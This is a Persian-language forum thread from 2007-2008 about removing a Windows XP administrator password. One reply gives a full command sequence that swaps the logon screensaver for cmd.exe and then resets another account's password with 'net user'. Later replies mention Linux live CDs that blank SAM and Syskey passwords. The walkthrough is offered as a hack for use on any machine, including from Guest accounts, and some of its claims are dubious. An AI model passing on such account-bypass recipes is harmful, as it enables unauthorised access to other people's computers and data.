PDA

نسخه کامل مشاهده نسخه کامل : براي حذف پسورد admin ويندوز xp كسي راهي سراغ داره

papijool
24-12-2007, 16:59
خيلي تاپيك ها در اين باره ساخته شده ولي من خيلي از آن ها را امتحان كردم و هيچ كدام كار نكرد اگر شما راهي سراغ داريد كه بشود بدون ورود به ويندوز پسورد آن را برداشت بنويسيد.:46:

usfelme
26-12-2007, 12:15
بهترين راه استفاده از نرم افزارهايي هست كه برپايه ي لينوكس كار مي كنند اگه باونا نميتونيد جواب بگيريد يه را هم اين است:
هك كردن پسورد Admin ويندوز xp (حتي در Limited و Guest )
براي اين‌كار
1-به Start > Run برويد و فرمان CMD را تايپ كرده Enter را بزنيد.
2-در پنجره ي باز شده اين فرمان‌ها را بدون عيب و نقص اجرا كنيد.
A. cd\
B. cd\windows\system32
C. mkdir hackpass
D. copy logon.scr hackpass \logon.scr
E. copy cmd.exe hackpass \cmd.exe
F. del logon.scr
G. rename cmd.exe logon.scr
H. exit

خط F , G را بايد در عرض كمتر 2 ثانيه انجام دهيد.براي اينكار مي‌توانيد از Clip Board ويندوز كمك بگيريد، يعني خط G را در Clip Board كپي كنيد سپس خط F را اجرا كرده و بلافاصله بعد از آن، با كليك راست كردن بر روي خط فرمان دستور خط G را Paste كرده سپس با زدن Enter اجرا كنيد.
با اين كار در حقيقت پرامت داس را بجاي Screen Saver به ويندوز معرفي مي‌كنيد و اين كار، ويندوز را ناپايدار مي‌كند.
فقط توصيه مي‌كنم قسمت F و G را خيلي سريع انجام دهيد، چون در غير اين صورت ويندوز با استفاده از سيستمي كه فايل‌هاي مهم ويندوز را بازيابي ميكند، تغييراتي كه ايجاد كرده‌ايد را بازسازي خواهد كرد.يعني اين دو خط دستور
3 -كامپيوتر را Restart نماييد.
4-Screen Saver ويندوز را فعال نماييد يا منتظر بمانيد تا خود بخود اجرا شود.خواهيد ديد كه، بجاي Screen Saver، خط فرمان DOS ظاهر مي‌شود.
5-اكنون اگر مثلا User name آن hacker-black.tk بود و خواستيد پسورد آن‌را به 222 تغيير دهيد اين فرمان را در پرامپت DOS انجام دهيد:
Net user hacker-black.tk 222
به اين ترتيب پسورد به 222 تغيير خواهد يافت.
نكته: حتما بعد از پايان كار دو فايلي را كه در پوشه‌ي hackpass كپي كرده‌ايد به جاي اصلي ‌آن برگردانيد.
راه دوم آسونتره ولی اول اون آموزش بالایی رو انجام بده بد اینم امتهان کن
cd\
cd\windows\system32
mkdir hackpass
copy logon.scr hackpass \logon.scr
copy cmd.exe hackpass \cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit

papijool
26-12-2007, 16:40
خيلي ممنون ولي من كلا نميتونم وارد سيستم بشم( Limited و Guest )پس از روش شما نميشه استفاده كرد. اگه راهي سراغ داريد كه بدون ورود به محيط ويندوز بشه كاري كرد بنويسيد. ممنون

Mohsen6558
26-12-2007, 16:52
استفاده از Sam ویندوز هست یه باگه که کرک هست ممکنه زود پیدا شه ممکنه نشه

usfelme
27-12-2007, 05:46
به راحتي پسورد admin را ---- كنيد!!!! ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

mr saad
09-01-2008, 08:00
ببخشید یک سوال دارم
اگر باتری مادر بورد را برداریم و دوباره جایش بگذاریم آیا پسورد ورودی ویندوز نیز از بین می رود؟

Behroooz
09-01-2008, 11:56
نه دوست عزيز . باطري فقط پسورد بايوس رو بر ميداره نه ويندوز

Mohsen6558
09-01-2008, 14:48
نه به باطری ربط نداره اون پسورد بایوس هست که با باطری حل می شه پسورد ویندوز با این روش نمی شه

mr saad
11-01-2008, 08:11
یعنی پس امن ترین رها برای محافظت از رایانه چیست؟(در برابر دسترسی غیر مجاز)

Mohsen6558
11-01-2008, 13:01
به نظر شخصی من Syskey
چون باید ویندوز رو فرمت کنه و دوباره نصب کنه تا وارد شه که این زمان بره

usfelme
12-01-2008, 01:53
به نظر شخصی من Syskey
چون باید ویندوز رو فرمت کنه و دوباره نصب کنه تا وارد شه که این زمان بره

با cd هایی که با لینوکس live کار می کنند syskey هم رمزش رو میشه blank کرد اون هم در کمتر از 5 دقیقه

Mohsen6558
12-01-2008, 21:46
با این همه فکر کنم بازم قوی ترین همینه چون این ترفند رو همه ازش آگاهی ندارن و در دسترس همه نیست اما بایوس و یوزر پسوردشون دیگه ...